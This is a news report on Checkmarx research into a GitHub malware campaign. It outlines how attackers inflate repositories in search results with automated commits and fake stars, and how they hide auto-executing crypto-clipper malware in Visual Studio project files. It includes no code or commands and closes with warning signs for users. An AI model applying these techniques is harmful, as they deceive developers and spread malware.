Threat actors are going to great lengths to ensure that malicious code hidden in legitimate-looking GitHub repositories is used by as many developers as possible, Checkmarx has warned.
The security vendor’s research engineer, Yehuda Gelb, described a number of techniques deployed in a recent campaign designed to ensure these repositories appear at the top of GitHub’s search results.
“Our recent findings reveal a threat actor creating GitHub repositories with names and topics that are likely to be searched by unsuspecting users,” he wrote. “These repositories are cleverly disguised as legitimate projects, often related to popular games, cheats, or tools, making it difficult for users to distinguish them from benign code.”
Gelb outlined two specific techniques being used in the campaign:
- Threat actors use GitHub Actions to automatically update their malicious repositories at high frequency with small, random changes. This artificially boosts their visibility, especially if a user filters search results by “most recently updated”
- The attackers use multiple fake accounts to add stars to their malicious repos, creating the illusion that they are highly trusted and popular. This also ensures the repos will appear high up in search results when the victim filters by “most stars”
“Unsuspecting users, often drawn to the top search results and repositories with seemingly positive engagement, are more likely to click on these malicious repositories and use the code or tools they provide, unaware of the hidden dangers lurking within,” Gelb warned.
The malware itself is hidden inside the seemingly legitimate repositories by being obfuscated in the .csproj or .vcxproj files typically used in Visual Studio projects, he continued. Once the repo is downloaded, the malware is automatically executed and checks to see if the victim’s IP is based in Russia, before downloading encrypted payloads from specific URLs.
Read more on GitHub threats: Security Experts Urge IT to Lock Down GitHub Services
According to the report, this particular campaign was designed to spread crypto-wallet clipper malware used to steal victims’ cryptocurrency – although the same techniques could theoretically be used to spread other malicious code.
Gelb urged GitHub users to keep a close eye on the commit frequency of repos listed on the platform, and whether they are introducing only minor changes. He added that if users with accounts created at the same time are adding stars to a particular repo, it should be another red flag.
Image credit: DJSinop and Michael Vi / Shutterstock.com